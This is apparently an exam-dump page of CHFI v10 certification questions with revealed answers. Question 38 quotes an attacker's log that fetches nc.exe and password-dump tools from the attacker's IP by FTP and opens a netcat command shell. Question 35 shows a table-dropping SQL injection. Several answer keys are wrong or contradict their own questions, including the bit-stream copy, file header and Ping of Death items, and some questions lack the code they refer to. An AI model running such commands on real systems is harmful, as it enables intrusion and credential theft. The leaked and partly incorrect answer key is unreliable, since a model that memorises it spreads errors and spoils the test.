Exam4Training

EC-Council 312-49v10 Computer Hacking Forensic Investigator (CHFI-v10) Online Training

Question #1

Larry is an IT consultant who works for corporations and government agencies. Larry plans on shutting down the city’s network using BGP devices and zombies?

What type of Penetration Testing is Larry planning to carry out?

  • A . Router Penetration Testing
  • B . DoS Penetration Testing
  • C . Firewall Penetration Testing
  • D . Internal Penetration Testing

Reveal Solution Hide Solution

Correct Answer: B
Question #2

You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case.

How would you permanently erase the data on the hard disk?

  • A . Throw the hard disk into the fire
  • B . Run the powerful magnets over the hard disk
  • C . Format the hard disk multiple times using a low level disk utility
  • D . Overwrite the contents of the hard disk with Junk data

Reveal Solution Hide Solution

Correct Answer: A
Question #3

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests.

What type of scan is Jessica going to perform?

  • A . Tracert
  • B . Smurf scan
  • C . Ping trace
  • D . ICMP ping sweep

Reveal Solution Hide Solution

Correct Answer: D
Question #4

This organization maintains a database of hash signatures for known software.

  • A . International Standards Organization
  • B . Institute of Electrical and Electronics Engineers
  • C . National Software Reference Library
  • D . American National standards Institute

Reveal Solution Hide Solution

Correct Answer: C
Question #5

Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM files on a computer. Where should Harold navigate on the computer to find the file?

  • A . %systemroot%system32LSA
  • B . %systemroot%system32driversetc
  • C . %systemroot%repair
  • D . %systemroot%LSA

Reveal Solution Hide Solution

Correct Answer: C
Question #6

You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company clients. You have rummaged through their trash and found very little information. You do not want to set off any alarms on their network, so you plan on performing passive foot printing against their Web servers.

What tool should you use?

  • A . Ping sweep
  • B . Nmap
  • C . Netcraft
  • D . Dig

Reveal Solution Hide Solution

Correct Answer: C
Question #7

Why should you note all cable connections for a computer you want to seize as evidence?

  • A . to know what outside connections existed
  • B . in case other devices were connected
  • C . to know what peripheral devices exist
  • D . to know what hardware existed

Reveal Solution Hide Solution

Correct Answer: A
Question #8

What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the router are effectively disabled?

  • A . digital attack
  • B . denial of service
  • C . physical attack
  • D . ARP redirect

Reveal Solution Hide Solution

Correct Answer: B
Question #9

One technique for hiding information is to change the file extension from the correct one to one that might not be noticed by an investigator. For example, changing a .jpg extension to a .doc extension so that a picture file appears to be a document.

What can an investigator examine to verify that a file has the correct extension?

  • A . the File Allocation Table
  • B . the file header
  • C . the file footer
  • D . the sector map

Reveal Solution Hide Solution

Correct Answer: B
Question #10

Bob has been trying to penetrate a remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use the System for a period of three weeks. However, law enforcement agencies were recoding his every activity and this was later presented as evidence.

The organization had used a Virtual Environment to trap Bob.

What is a Virtual Environment?

  • A . A Honeypot that traps hackers
  • B . A system Using Trojaned commands
  • C . An environment set up after the user logs in
  • D . An environment set up before a user logs in

Reveal Solution Hide Solution

Correct Answer: A

Question #11

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years.

You navigate to archive. org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal:

What have you found?

  • A . Web bug
  • B . CGI code
  • C . Trojan.downloader
  • D . Blind bug

Reveal Solution Hide Solution

Correct Answer: A
Question #12

After undergoing an external IT audit, George realizes his network is vulnerable to DDoS attacks.

What countermeasures could he take to prevent DDoS attacks?

  • A . Enable direct broadcasts
  • B . Disable direct broadcasts
  • C . Disable BGP
  • D . Enable BGP

Reveal Solution Hide Solution

Correct Answer: B
Question #13

What is the following command trying to accomplish?

  • A . Verify that UDP port 445 is open for the 192.168.0.0 network
  • B . Verify that TCP port 445 is open for the 192.168.0.0 network
  • C . Verify that NETBIOS is running for the 192.168.0.0 network
  • D . Verify that UDP port 445 is closed for the 192.168.0.0 network

Reveal Solution Hide Solution

Correct Answer: A
Question #14

Which part of the Windows Registry contains the user’s password file?

  • A . HKEY_LOCAL_MACHINE
  • B . HKEY_CURRENT_CONFIGURATION
  • C . HKEY_USER
  • D . HKEY_CURRENT_USER

Reveal Solution Hide Solution

Correct Answer: A
Question #15

Printing under a Windows Computer normally requires which one of the following files types to be created?

  • A . EME
  • B . MEM
  • C . EMF
  • D . CME

Reveal Solution Hide Solution

Correct Answer: C
Question #16

You are working as a Computer forensics investigator for a corporation on a computer abuse case. You discover evidence that shows the subject of your investigation is also embezzling money from the company. The company CEO and the corporate legal counsel advise you to contact law enforcement and provide them with the evidence that you have found. The law enforcement officer that responds requests that you put a network sniffer on your network and monitor all traffic to the subject’s computer.

You inform the officer that you will not be able to comply with that request because doing so would:

  • A . Violate your contract
  • B . Cause network congestion
  • C . Make you an agent of law enforcement
  • D . Write information to the subject’s hard drive

Reveal Solution Hide Solution

Correct Answer: C
Question #17

An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer.

Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?

  • A . EFS uses a 128-bit key that can’t be cracked, so you will not be able to recover the information
  • B . When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information.
  • C . The EFS Revoked Key Agent can be used on the Computer to recover the information
  • D . When the Encrypted file was copied to the floppy disk, the EFS private key was also copied to the floppy disk, so you can recover the information.

Reveal Solution Hide Solution

Correct Answer: B
Question #18

Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company’s network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG.

What is Simon trying to accomplish here?

  • A . Send DOS commands to crash the DNS servers
  • B . Perform DNS poisoning
  • C . Perform a zone transfer
  • D . Enumerate all the users in the domain

Reveal Solution Hide Solution

Correct Answer: C
Question #19

You should make at least how many bit-stream copies of a suspect drive?

  • A . 1
  • B . 2
  • C . 3
  • D . 4

Reveal Solution Hide Solution

Correct Answer: B
Question #20

When using Windows acquisitions tools to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to:

  • A . Automate Collection from image files
  • B . Avoiding copying data from the boot partition
  • C . Acquire data from host-protected area on a disk
  • D . Prevent Contamination to the evidence drive

Reveal Solution Hide Solution

Correct Answer: D

Question #21

You are assisting a Department of Defense contract company to become compliant with the stringent security policies set by the DoD. One such strict rule is that firewalls must only allow incoming connections that were first initiated by internal computers.

What type of firewall must you implement to abide by this policy?

  • A . Packet filtering firewall
  • B . Circuit-level proxy firewall
  • C . Application-level proxy firewall
  • D . Stateful firewall

Reveal Solution Hide Solution

Correct Answer: D
Question #22

The newer Macintosh Operating System is based on:

  • A . OS/2
  • B . BSD Unix
  • C . Linux
  • D . Microsoft Windows

Reveal Solution Hide Solution

Correct Answer: B
Question #23

If you discover a criminal act while investigating a corporate policy abuse, it becomes a publicsector investigation and should be referred to law enforcement?

  • A . true
  • B . false

Reveal Solution Hide Solution

Correct Answer: A
Question #24

The use of warning banners helps a company avoid litigation by overcoming an employee assumed __________________________. When connecting to the company’s intranet, network or Virtual Private Network (VPN) and will allow the company’s investigators to monitor, search and retrieve information stored within the network.

  • A . Right to work
  • B . Right of free speech
  • C . Right to Internet Access
  • D . Right of Privacy

Reveal Solution Hide Solution

Correct Answer: D
Question #25

Michael works for Kimball Construction Company as senior security analyst. As part of yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts XMAS scan and most of the ports scanned do not give a response.

In what state are these ports?

  • A . Closed
  • B . Open
  • C . Stealth
  • D . Filtered

Reveal Solution Hide Solution

Correct Answer: B
Question #26

You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a “simple backup copy” of the hard drive in the PC and put it on this drive and requests that you examine that drive for evidence of the suspected images. You inform him that a “simple backup copy” will not provide deleted files or recover file fragments.

What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceeding?

  • A . Bit-stream Copy
  • B . Robust Copy
  • C . Full backup Copy
  • D . Incremental Backup Copy

Reveal Solution Hide Solution

Correct Answer: C
Question #27

Software firewalls work at which layer of the OSI model?

  • A . Application
  • B . Network
  • C . Transport
  • D . Data Link

Reveal Solution Hide Solution

Correct Answer: D
Question #28

Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server.

Why will Jonathan not succeed?

  • A . Only an HTTPS session can be hijacked
  • B . HTTP protocol does not maintain session
  • C . Only FTP traffic can be hijacked
  • D . Only DNS traffic can be hijacked

Reveal Solution Hide Solution

Correct Answer: B
Question #29

The efforts to obtain information before a trail by demanding documents, depositions, questioned and answers written under oath, written requests for admissions of fact and examination of the scene is a description of what legal term?

  • A . Detection
  • B . Hearsay
  • C . Spoliation
  • D . Discovery

Reveal Solution Hide Solution

Correct Answer: D
Question #30

Which response organization tracks hoaxes as well as viruses?

  • A . NIPC
  • B . FEDCIRC
  • C . CERT
  • D . CIAC

Reveal Solution Hide Solution

Correct Answer: D

Question #31

When examining a file with a Hex Editor, what space does the file header occupy?

  • A . the last several bytes of the file
  • B . the first several bytes of the file
  • C . none, file headers are contained in the FAT
  • D . one byte at the beginning of the file

Reveal Solution Hide Solution

Correct Answer: D
Question #32

While working for a prosecutor, what do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense?

  • A . Keep the information of file for later review
  • B . Destroy the evidence
  • C . Bring the information to the attention of the prosecutor, his or her supervisor or finally to the judge
  • D . Present the evidence to the defense attorney

Reveal Solution Hide Solution

Correct Answer: C
Question #33

Office Documents (Word, Excel and PowerPoint) contain a code that allows tracking the MAC or unique identifier of the machine that created the document.

What is that code called?

  • A . Globally unique ID
  • B . Microsoft Virtual Machine Identifier
  • C . Personal Application Protocol
  • D . Individual ASCII string

Reveal Solution Hide Solution

Correct Answer: A
Question #34

A(n) _____________________ is one that’s performed by a computer program rather than the attacker manually performing the steps in the attack sequence.

  • A . blackout attack
  • B . automated attack
  • C . distributed attack
  • D . central processing attack

Reveal Solution Hide Solution

Correct Answer: B
Question #35

What will the following command produce on a website login page? SELECT email, passwd, login_id, full_name FROM members WHERE email = ‘someone@somehwere.com’; DROP TABLE members; –‘

  • A . Deletes the entire members table
  • B . Inserts the Error! Reference source not found.email address into the members table
  • C . Retrieves the password for the first user in the members table
  • D . This command will not produce anything since the syntax is incorrect

Reveal Solution Hide Solution

Correct Answer: A
Question #36

Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow FTP-PUT.

Which firewall would be most appropriate for Harold? needs?

  • A . Circuit-level proxy firewall
  • B . Packet filtering firewall
  • C . Application-level proxy firewall
  • D . Data link layer firewall

Reveal Solution Hide Solution

Correct Answer: C
Question #37

If an attacker’s computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?

  • A . The zombie will not send a response
  • B . 31402
  • C . 31399
  • D . 31401

Reveal Solution Hide Solution

Correct Answer: D
Question #38

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Short reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly.

The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

  • A . It is a local exploit where the attacker logs in using username johna2k
  • B . There are two attackers on the system – johna2k and haxedj00
  • C . The attack is a remote exploit and the hacker downloads three files
  • D . The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Reveal Solution Hide Solution

Correct Answer: C
C

Explanation:

The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.

Question #39

If you plan to startup a suspect’s computer, you must modify the ___________ to ensure that you do not contaminate or alter data on the suspect’s hard drive by booting to the hard drive.

  • A . deltree command
  • B . CMOS
  • C . Boot.sys
  • D . Scandisk utility

Reveal Solution Hide Solution

Correct Answer: C
Question #40

In General, __________________ Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data.

  • A . Network Forensics
  • B . Data Recovery
  • C . Disaster Recovery
  • D . Computer Forensics

Reveal Solution Hide Solution

Correct Answer: D

Question #41

How many sectors will a 125 KB file use in a FAT32 file system?

  • A . 32
  • B . 16
  • C . 256
  • D . 25

Reveal Solution Hide Solution

Correct Answer: C
Question #42

Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking languages.

What networking protocol language should she learn that routers utilize?

  • A . ATM
  • B . UDP
  • C . BPG
  • D . OSPF

Reveal Solution Hide Solution

Correct Answer: D
Question #43

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab.

How many law-enforcement computer investigators should you request to staff the lab?

  • A . 8
  • B . 1
  • C . 4
  • D . 2

Reveal Solution Hide Solution

Correct Answer: C
Question #44

A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he has removed any images he might have downloaded.

What can the investigator do to prove the violation?

  • A . Image the disk and try to recover deleted files
  • B . Seek the help of co-workers who are eye-witnesses
  • C . Check the Windows registry for connection data (you may or may not recover)
  • D . Approach the websites for evidence

Reveal Solution Hide Solution

Correct Answer: A
Question #45

Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity.

After a computer has been compromised by a hacker, which of the following would be most important in forming a profile of the incident?

  • A . The manufacturer of the system compromised
  • B . The logic, formatting and elegance of the code used in the attack
  • C . The nature of the attack
  • D . The vulnerability exploited in the incident

Reveal Solution Hide Solution

Correct Answer: B
Question #46

Melanie was newly assigned to an investigation and asked to make a copy of all the evidence from the compromised system. Melanie did a DOS copy of all the files on the system.

What would be the primary reason for you to recommend a disk imaging tool?

  • A . A disk imaging tool would check for CRC32s for internal self-checking and validation and have MD5 checksum
  • B . Evidence file format will contain case data entered by the examiner and encrypted at the beginning of the evidence file
  • C . A simple DOS copy will not include deleted files, file slack and other information
  • D . There is no case for an imaging tool as it will use a closed, proprietary format that if compared to the original will not match up sector for sector

Reveal Solution Hide Solution

Correct Answer: C
Question #47

What does the acronym POST mean as it relates to a PC?

  • A . Primary Operations Short Test
  • B . PowerOn Self Test
  • C . Pre Operational Situation Test
  • D . Primary Operating System Test

Reveal Solution Hide Solution

Correct Answer: B
Question #48

In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?

  • A . evidence must be handled in the same way regardless of the type of case
  • B . evidence procedures are not important unless you work for a law enforcement agency
  • C . evidence in a criminal case must be secured more tightly than in a civil case
  • D . evidence in a civil case must be secured more tightly than in a criminal case

Reveal Solution Hide Solution

Correct Answer: C
Question #49

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.

  • A . 0
  • B . 10
  • C . 100
  • D . 1

Reveal Solution Hide Solution

Correct Answer: A
Question #50

If a suspect computer is located in an area that may have toxic chemicals, you must:

  • A . coordinate with the HAZMAT team
  • B . determine a way to obtain the suspect computer
  • C . assume the suspect machine is contaminated
  • D . do not enter alone

Reveal Solution Hide Solution

Correct Answer: A

Question #51

In a FAT32 system, a 123 KB file will use how many sectors?

  • A . 34
  • B . 25
  • C . 11
  • D . 56

Reveal Solution Hide Solution

Correct Answer: B
Question #52

When investigating a Windows System, it is important to view the contents of the page or swap file because:

  • A . Windows stores all of the systems configuration information in this file
  • B . This is file that windows use to communicate directly with Registry
  • C . A Large volume of data can exist within the swap file of which the computer user has no knowledge
  • D . This is the file that windows use to store the history of the last 100 commands that were run from the command line

Reveal Solution Hide Solution

Correct Answer: C
Question #53

When obtaining a warrant, it is important to:

  • A . particularlydescribe the place to be searched and particularly describe the items to be seized
  • B . generallydescribe the place to be searched and particularly describe the items to be seized
  • C . generallydescribe the place to be searched and generally describe the items to be seized
  • D . particularlydescribe the place to be searched and generally describe the items to be seized

Reveal Solution Hide Solution

Correct Answer: A
Question #54

When examining the log files from a Windows IIS Web Server, how often is a new log file created?

  • A . the same log is used at all times
  • B . a new log file is created everyday
  • C . a new log file is created each week
  • D . a new log is created each time the Web Server is started

Reveal Solution Hide Solution

Correct Answer: A
Question #55

Meyer Electronics Systems just recently had a number of laptops stolen out of their office. On these laptops contained sensitive corporate information regarding patents and company strategies. A month after the laptops were stolen, a competing company was found to have just developed products that almost exactly duplicated products that Meyer produces.

What could have prevented this information from being stolen from the laptops?

  • A . EFS Encryption
  • B . DFS Encryption
  • C . IPS Encryption
  • D . SDW Encryption

Reveal Solution Hide Solution

Correct Answer: A
Question #56

Terri works for a security consulting firm that is currently performing a penetration test on First National Bank in Tokyo. Terri’s duties include bypassing firewalls and switches to gain access to the network. Terri sends an IP packet to one of the company’s switches with ACK bit and the source address of her machine set.

What is Terri trying to accomplish by sending this IP packet?

  • A . Trick the switch into thinking it already has a session with Terri’s computer
  • B . Poison the switch’s MAC address table by flooding it with ACK bits
  • C . Crash the switch with a DoS attack since switches cannot send ACK bits
  • D . Enable tunneling feature on the switch

Reveal Solution Hide Solution

Correct Answer: A
Question #57

What binary coding is used most often for e-mail purposes?

  • A . MIME
  • B . Uuencode
  • C . IMAP
  • D . SMTP

Reveal Solution Hide Solution

Correct Answer: A
Question #58

After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, stateful firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet.

Why is that?

  • A . Stateful firewalls do not work with packet filtering firewalls
  • B . NAT does not work with stateful firewalls
  • C . IPSEC does not work with packet filtering firewalls
  • D . NAT does not work with IPSEC

Reveal Solution Hide Solution

Correct Answer: D
Question #59

Which federal computer crime law specifically refers to fraud and related activity in connection with access devices like routers?

  • A . 18 U.S.C. 1029
  • B . 18 U.S.C. 1362
  • C . 18 U.S.C. 2511
  • D . 18 U.S.C. 2703

Reveal Solution Hide Solution

Correct Answer: A
Question #60

Diskcopy is:

  • A . a utility by AccessData
  • B . a standard MS-DOS command
  • C . Digital Intelligence utility
  • D . dd copying tool

Reveal Solution Hide Solution

Correct Answer: B
B

Explanation:

diskcopy is a STANDARD DOS utility. C:WINDOWS>diskcopy /? Copies the contents of one floppy disk to another.

Question #61

You are a computer forensics investigator working with local police department and you are called to assist in an investigation of threatening emails. The complainant has printer out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the _________________________ in order to track the emails back to the suspect.

  • A . Routing Table
  • B . Firewall log
  • C . Configuration files
  • D . Email Header

Reveal Solution Hide Solution

Correct Answer: D
Question #62

What is a good security method to prevent unauthorized users from "tailgating"?

  • A . Man trap
  • B . Electronic combination locks
  • C . Pick-resistant locks
  • D . Electronic key systems

Reveal Solution Hide Solution

Correct Answer: A
Question #63

You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe.

What are you trying to accomplish here?

  • A . Poison the DNS records with false records
  • B . Enumerate MX and A records from DNS
  • C . Establish a remote connection to the Domain Controller
  • D . Enumerate domain user accounts and built-in groups

Reveal Solution Hide Solution

Correct Answer: D
Question #64

Which of the following is NOT a graphics file?

  • A . Picture1.tga
  • B . Picture2.bmp
  • C . Picture3.nfo
  • D . Picture4.psd

Reveal Solution Hide Solution

Correct Answer: C
Question #65

You are the security analyst working for a private company out of France. Your current assignment is to obtain credit card information from a Swiss bank owned by that company. After initial reconnaissance, you discover that the bank security defenses are very strong and would take too long to penetrate. You decide to get the information by monitoring the traffic between the bank and one of its subsidiaries in London. After monitoring some of the traffic, you see a lot of FTP packets traveling back and forth. You want to sniff the traffic and extract usernames and passwords.

What tool could you use to get this information?

  • A . Airsnort
  • B . Snort
  • C . Ettercap
  • D . RaidSniff

Reveal Solution Hide Solution

Correct Answer: C
Question #66

In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider (ISP). You contact ISP and request that they provide you assistance with your investigation.

What assistance can the ISP provide?

  • A . The ISP can investigate anyone using their service and can provide you with assistance
  • B . The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you without a warrant
  • C . The ISP can’t conduct any type of investigations on anyone and therefore can’t assist you
  • D . ISP’s never maintain log files so they would be of no use to your investigation

Reveal Solution Hide Solution

Correct Answer: B
Question #67

What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of Death?

  • A . ICMP header field
  • B . TCP header field
  • C . IP header field
  • D . UDP header field

Reveal Solution Hide Solution

Correct Answer: B
Question #68

What should you do when approached by a reporter about a case that you are working on or have worked on?

  • A . Refer the reporter to the attorney that retained you
  • B . Say, "no comment"
  • C . Answer all the reporter’s questions as completely as possible
  • D . Answer only the questions that help your case

Reveal Solution Hide Solution

Correct Answer: A
Question #69

A law enforcement officer may only search for and seize criminal evidence with _______________________, which are facts or circumstances that would lead a reasonable person to believe a crime has been committed or is about to be committed, evidence of the specific crime exists and the evidence of the specific crime exists at the place to be searched.

  • A . Mere Suspicion
  • B . A preponderance of the evidence
  • C . Probable cause
  • D . Beyond a reasonable doubt

Reveal Solution Hide Solution

Correct Answer: C
Question #70

You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive.

Which of the following formats correctly specifies these sectors?

  • A . 0:1000, 150
  • B . 0:1709, 150
  • C . 1:1709, 150
  • D . 0:1709-1858

Reveal Solution Hide Solution

Correct Answer: B

Question #71

In Linux, what is the smallest possible shellcode?

  • A . 24 bytes
  • B . 8 bytes
  • C . 800 bytes
  • D . 80 bytes

Reveal Solution Hide Solution

Correct Answer: A
Question #72

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network.

What type of DoS attack is James testing against his network?

  • A . Smurf
  • B . Trinoo
  • C . Fraggle
  • D . SYN flood

Reveal Solution Hide Solution

Correct Answer: A
Question #73

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?

  • A . rootkit
  • B . key escrow
  • C . steganography
  • D . Offset

Reveal Solution Hide Solution

Correct Answer: C
Question #74

What does ICMP Type 3/Code 13 mean?

  • A . Host Unreachable
  • B . Administratively Blocked
  • C . Port Unreachable
  • D . Protocol Unreachable

Reveal Solution Hide Solution

Correct Answer: B
Question #75

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

  • A . Linux/Unix computers are easier to compromise
  • B . Linux/Unix computers are constantly talking
  • C . Windows computers are constantly talking
  • D . Windows computers will not respond to idle scans

Reveal Solution Hide Solution

Correct Answer: C
Question #76

What TCP/UDP port does the toolkit program netstat use?

  • A . Port 7
  • B . Port 15
  • C . Port 23
  • D . Port 69

Reveal Solution Hide Solution

Correct Answer: B
Question #77

You are working for a large clothing manufacturer as a computer forensics investigator and are called in to investigate an unusual case of an employee possibly stealing clothing designs from the company and selling them under a different brand name for a different company.

What you discover during the course of the investigation is that the clothing designs are actually original products of the employee and the company has no policy against an employee selling his own designs on his own time. The only thing that you can find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as that of the company with only the wording in the graphic being different.

What area of the law is the employee violating?

  • A . trademark law
  • B . copyright law
  • C . printright law
  • D . brandmark law

Reveal Solution Hide Solution

Correct Answer: A
Question #78

Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that show up as unknown but Questionable in the logs. He looks up the behavior on the Internet, but cannot find anything related.

What organization should Frank submit the log to find out if it is a new vulnerability or not?

  • A . APIPA
  • B . IANA
  • C . CVE
  • D . RIPE

Reveal Solution Hide Solution

Correct Answer: C
Question #79

Hackers can gain access to Windows Registry and manipulate user passwords, DNS settings, access rights or others features that they may need in order to accomplish their objectives.

One simple method for loading an application at startup is to add an entry (Key) to the following Registry Hive:

  • A . HKEY_LOCAL_MACHINEhardwarewindowsstart
  • B . HKEY_LOCAL_USERSSoftwareMicrosoftoldVersionLoad
  • C . HKEY_CURRENT_USERMicrosoftDefault
  • D . HKEY_LOCAL_MACHINESoftwareMicrosoftCurrentVersionRun

Reveal Solution Hide Solution

Correct Answer: D
Question #80

You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved.

What should you examine next in this case?

  • A . The registry
  • B . The swap file
  • C . The recycle bin
  • D . The metadata

Reveal Solution Hide Solution

Correct Answer: B

Question #81

George is performing security analysis for Hammond and Sons LLC. He is testing security vulnerabilities of their wireless network. He plans on remaining as "stealthy" as possible during the scan.

Why would a scanner like Nessus is not recommended in this situation?

  • A . Nessus is too loud
  • B . Nessus cannot perform wireless testing
  • C . Nessus is not a network scanner
  • D . There are no ways of performing a "stealthy" wireless scan

Reveal Solution Hide Solution

Correct Answer: A
Question #82

You have been asked to investigate after a user has reported a threatening e-mail they have received from an external source.

Which of the following are you most interested in when trying to trace the source of the message?

  • A . The X509 Address
  • B . The SMTP reply Address
  • C . The E-mail Header
  • D . The Host Domain Name

Reveal Solution Hide Solution

Correct Answer: C
Question #83

What does mactime, an essential part of the coroner’s toolkit do?

  • A . It traverses the file system and produces a listing of all files based on the modification, access and change timestamps
  • B . It can recover deleted file space and search it for data. However, it does not allow the investigator to preview them
  • C . The tools scans for i-node information, which is used by other tools in the tool kit
  • D . It is too specific to the MAC OS and forms a core component of the toolkit

Reveal Solution Hide Solution

Correct Answer: A
Question #84

Julia is a senior security analyst for Berber Consulting group. She is currently working on a contract for a small accounting firm in Florid a. They have given her permission to perform social engineering attacks on the company to see if their in-house training did any good.

Julia calls the main number for the accounting firm and talks to the receptionist. Julia says that she is an IT technician from the company’s main office in Iowa. She states that she needs the receptionist’s network username and password to troubleshoot a problem they are having. Julia says that Bill Hammond, the CEO of the company, requested this information. After hearing the name of the CEO, the receptionist gave Julia all the information she asked for.

What principal of social engineering did Julia use?

  • A . Social Validation
  • B . Scarcity
  • C . Friendship/Liking
  • D . Reciprocation

Reveal Solution Hide Solution

Correct Answer: D
Question #85

The objective of this act was to protect consumers’ personal financial information held by financial institutions and their service providers.

  • A . Gramm-Leach-Bliley Act
  • B . Sarbanes-Oxley 2002
  • C . California SB 1386
  • D . HIPAA

Reveal Solution Hide Solution

Correct Answer: A
Question #86

To preserve digital evidence, an investigator should ____________________.

  • A . Make two copies of each evidence item using a single imaging tool
  • B . Make a single copy of each evidence item using an approved imaging tool
  • C . Make two copies of each evidence item using different imaging tools
  • D . Only store the original evidence item

Reveal Solution Hide Solution

Correct Answer: C
Question #87

When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?

  • A . Passive IDS
  • B . Active IDS
  • C . Progressive IDS
  • D . NIPS

Reveal Solution Hide Solution

Correct Answer: B
Question #88

As a security analyst, you setup a false survey website that will require users to create a username and a strong password. You send the link to all the employees of the company.

What information will you be able to gather?

  • A . The IP address of the employees’ computers
  • B . Bank account numbers and the corresponding routing numbers
  • C . The employees network usernames and passwords
  • D . The MAC address of the employees’ computers

Reveal Solution Hide Solution

Correct Answer: C
Question #89

You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation.

Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive.

How will these forms be stored to help preserve the chain of custody of the case?

  • A . All forms should be placed in an approved secure container because they are now primary evidence in the case.
  • B . The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container.
  • C . The multi-evidence form should be placed in an approved secure container with the hard drives and the single-evidence forms should be placed in the report file.
  • D . All forms should be placed in the report file because they are now primary evidence in the case.

Reveal Solution Hide Solution

Correct Answer: B
Question #90

Sectors in hard disks typically contain how many bytes?

  • A . 256
  • B . 512
  • C . 1024
  • D . 2048

Reveal Solution Hide Solution

Correct Answer: B

Question #91

During the course of a corporate investigation, you find that an Employee is committing a crime.

Can the Employer file a criminal complaint with Police?

  • A . Yes, and all evidence can be turned over to the police
  • B . Yes, but only if you turn the evidence over to a federal law enforcement agency
  • C . No, because the investigation was conducted without following standard police procedures
  • D . No, because the investigation was conducted without warrant

Reveal Solution Hide Solution

Correct Answer: A
Question #92

During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence.

This type of evidence is known as:

  • A . Inculpatory evidence
  • B . Mandatory evidence
  • C . Exculpatory evidence
  • D . Terrible evidence

Reveal Solution Hide Solution

Correct Answer: C
Question #93

